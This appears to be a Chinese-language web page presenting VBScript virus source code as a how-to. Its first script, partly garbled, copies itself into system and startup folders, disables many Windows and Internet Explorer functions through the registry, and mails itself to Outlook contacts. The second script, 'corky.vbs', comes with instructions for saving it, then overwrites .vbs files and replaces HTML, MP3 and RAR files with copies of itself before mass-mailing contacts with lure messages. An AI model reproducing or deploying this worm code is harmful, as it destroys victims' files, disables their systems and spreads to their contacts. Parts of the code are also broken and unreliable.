A. 電腦病毒源代碼介紹
電腦中了病毒想從它的源代碼入手怎麼辦呢!有我在,下面由我給你做出詳細的電腦病毒源代碼介紹!希望對你有幫助!
電腦病毒源代碼介紹:
電腦病毒源代碼一:
on error resume next
set fs=createobject("ing.filesystemobject" '創建一個能與 操作系統 溝通的對象,再利用該對象的各種 方法 對注冊表進行操作
set dir1=fs.getspecialfolder(0) '獲取windows/winnt文件夾位置
set dir2=fs.getspecialfolder(1) '獲取system32/system文件夾位置
set so=createobject("ing.filesystemobject"
dim r '定義一個變數
set r=createobject("w.shell"
so.getfile(w.fullname).(dir1&"win32system.vbs" '復制病毒副本到windows/winnt文件夾位置
so.getfile(w.fullname).(dir2&"win32system.vbs" '復制病毒副本到system32/system文件夾位置
so.getfile(w.fullname).(dir1&"start menuprograms啟動win32system.vbs" '復制病毒副本到start menu啟動菜單
'下面是對注冊表的惡意修改和簡單的依靠oe傳播
r.regwrite " orun",1,"reg_dword" '修改注冊表,禁止“運行”菜單
r.regwrite " oclose",1,"reg_dword" '修改注冊表,禁止“關閉”菜單
r.regwrite " odrives",63000000,"reg_dword" '修改注冊表,隱藏所有邏輯盤符
r.regwrite "ytools",1,"reg_dword" '修改注冊表,禁止注冊表編輯
r.regwrite " unscanregistry","" '修改注冊表,禁止開機注冊表掃描
r.regwrite " ologoff",1,"reg_dword" '修改注冊表,禁止“注銷”菜單
r.regwrite " orealmode",1,"reg_dword" '修改注冊表,禁止ms-dos實模式
r.regwrite " unwin32system","win32system.vbs" '修改注冊表,使這個腳本本身開機自動運行
r.regwrite " odesktop",1,"reg_dword" '修改注冊表,禁止顯示桌面圖標
r.regwrite "disabled",1,"reg_dword" '修改注冊表,禁止純dos模式
r.regwrite " osettaskbar",1,"reg_dword" '修改注冊表,禁止“任務欄和開始”菜單
r.regwrite " oviewcontextmenu",1,"reg_dword" '修改注冊表,禁止右鍵菜單
電腦病毒源代碼二:
r.regwrite " osetfolders",1,"reg_dword" '修改注冊表,禁止控制面板
r.regwrite "hklmsoftwareclasses.reg","txtfile" '修改注冊表,禁止導入使用.reg文件,改為用txt文件的關聯
r.regwrite "winlogonlegalnoticecaption","警告" '設置開機提示框標題
r.regwrite "winlogonlegalnoticetext","您中vbs腳本病毒了,哭吧~" '設置開機提示框文本內容
set ol=createobject("outlook.application" '創建outlook文件對象用於傳播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用於向地址簿的前100名發送此 vbs病毒,可以算是簡單弱智的蠕蟲了吧~~
mail.subject="今晚你來嗎?" '郵件主題
mail.body="朋友你好:您的朋友rose給您發來了熱情的邀請。具體情況請閱讀隨信附件,祝您好運! 同城約會網" '郵件內容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
'下面是對internet explore 選項的惡意修改
r.regwrite " explorer estrictions obrowsercontextmenu",1,"reg_dword" '修改注冊表,禁止滑鼠右鍵
r.regwrite " explorer estrictions obrowseroptions",1,"reg_dword" '修改注冊表,禁止internet選項
r.regwrite " explorer estrictions obrowsersaveas",1,"reg_dword" '修改注冊表,禁止“另存為”
r.regwrite " explorer estrictions ofileopen",1,"reg_dword" '修改注冊表,禁止“文件/打開”菜單
r.regwrite " explorercontrol paneladvanced",1,"reg_dword" '修改注冊表,禁止更改高級頁設置
r.regwrite " explorercontrol panelcache internet",1,"reg_dword" '修改注冊表,禁止更改臨時文件設置
r.regwrite " explorercontrol panelautoconfig",1,"reg_dword" '修改注冊表,禁止更改自動配置
r.regwrite " explorercontrol panelhomepage",1,"reg_dword" '修改注冊表,禁止更改主頁,即“主頁”變灰
r.regwrite " explorercontrol panelhistory",1,"reg_dword" '修改注冊表,禁止更改歷史記錄設置
r.regwrite " explorercontrol panelconnwiz admin lock",1,"reg_dword" '修改注冊表,禁止更改internet連接向導
r.regwrite " explorercontrol panelsecuritytab",1,"reg_dword" '修改注冊表,禁止更改安全項
r.regwrite " explorercontrol panel esetwebsettings",1,"reg_dword" '修改注冊表,禁止“重置web設置”
r.regwrite " explorer estrictions oviewsource",1,"reg_dword" '修改注冊表,禁止查看源文件
r.regwrite " explorerinfodelivery estrictions oaddingsubions",1,"reg_dword" '修改注冊表,禁止添加離線計劃
B. 求VBS腳本病毒源碼
'corky.vbs
'corky
'11-16-2007
'用記事本存為corky.vbs,文件類型選所有文件即*.*
dim wsh,fso,fa,allvbs,syspath,winpath
set wsh=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
set fa=fso.openTextFile(Wscript.ScriptFullName,1)
allvbs=fa.ReadAll
fa.close
settimeout
winpath=GSF(0)
syspath=GSF(1)
writereg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer",syspath&"\corky.vbs"
writereg "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer",winpath&"\system.vbs"
file BP(winpath,"system.vbs")
file BP(syspath,"corky.vbs")
listdrive
net
sendmail
set wsh=nothing
set fso=nothing
sub settimeout()
on error resume next
dim a,re
set a=createobject("wscript.shell")
re=a.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (re>=1) then
a.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
end sub
sub file(filename)
dim fso,wsh,f1,f2
set fso=createobject("scripting.filesystemobject")
fso.getfile(wscript.scriptfullname).(filename)
end sub
sub writereg(a,b)
dim wsh
set wsh=createobject("wscript.shell")
wsh.regwrite a,b
end sub
sub listdrive()
dim ds,d
set ds=fso.drives
for each d in ds
if d.drivetype=2 or d.drivetype=3 then
listfile d.path&"\"
listfolder d.path&"\"
end if
next
end sub
sub listfolder(fds)
dim fs,fd,fdf,fn
set fs=fso.getfolder(fds)
set fd=fs.subfolders
for each fdf in fd
listfile(fdf.path)
listfolder(fdf.path)
next
end sub
sub listfile(folder)
dim fd,fs,f,ext,f1,fn,fh
set fd=fso.getfolder(folder)
set fs=fd.files
for each f in fs
ext =fso.GetExtensionName(f)
ext=Lcase(ext)
fn=Lcase(f.name)
f.attributes=0
if (ext="vbs") Then
set f1=fso.openTextFile(f.path,2,true)
f1.write allvbs
f1.close
end if
if (ext="htm" ) or (ext="html") or (ext="mp3") or (ext="rar") then
set fh=fso.CreateTextFile(f.path&".vbs",True)
fh.write allvbs
fh.close
f.delete
end if
next
end sub
sub net()
on error resume next
dim netobj,nd
dim i
set netobj=createobject("wscript.network")
set nd=netobj.EnumNetworkDrives
if nd.Count >0 then
For i=0 to nd.Count-1
fso.file BF(GSF(0),"System.vbs")
next
end if
end sub
function BP(d,p)
on error resume next
BP=fso.Buildpath(d,p)
end function
function SF(fd)
on error resume next
SF=fso.SpecialFolder(fd)
end function
function GSF(fi)
on error resume next
GSF=fso.GetSpecialFolder(fi)
end function
sub sendmail()
On Error Resume Next
set outobj=Wscript.CreateObject("Outlook.Application")
If outobj= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI")
Set addrList= mapiObj.AddressLists
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
For addrEntIndex= 1 To addrEntCount
Set item = outlookApp.CreateItem(0)
Set addrEnt = addr.AddressEntries(addrEntIndex)
item.To = addrEnt.Address
item.Subject ="你好嗎老朋友?好久不見了"
item.Body = "這里是我自己製作的賀卡希望你能喜歡!"
Set attachMents=item.Attachments
attachMents.Add fileSysObj.GetSpecialFolder(1)&"corky.vbs"
item.DeleteAfterSubmit = True
If item.To <> "" Then
item.Send
wsh.regwrite "HKCU\software\Mailtest\mailed", "1"
End If
Next
End If
Next
End if
set mapiObj=nothing
set outobj=nothing
end sub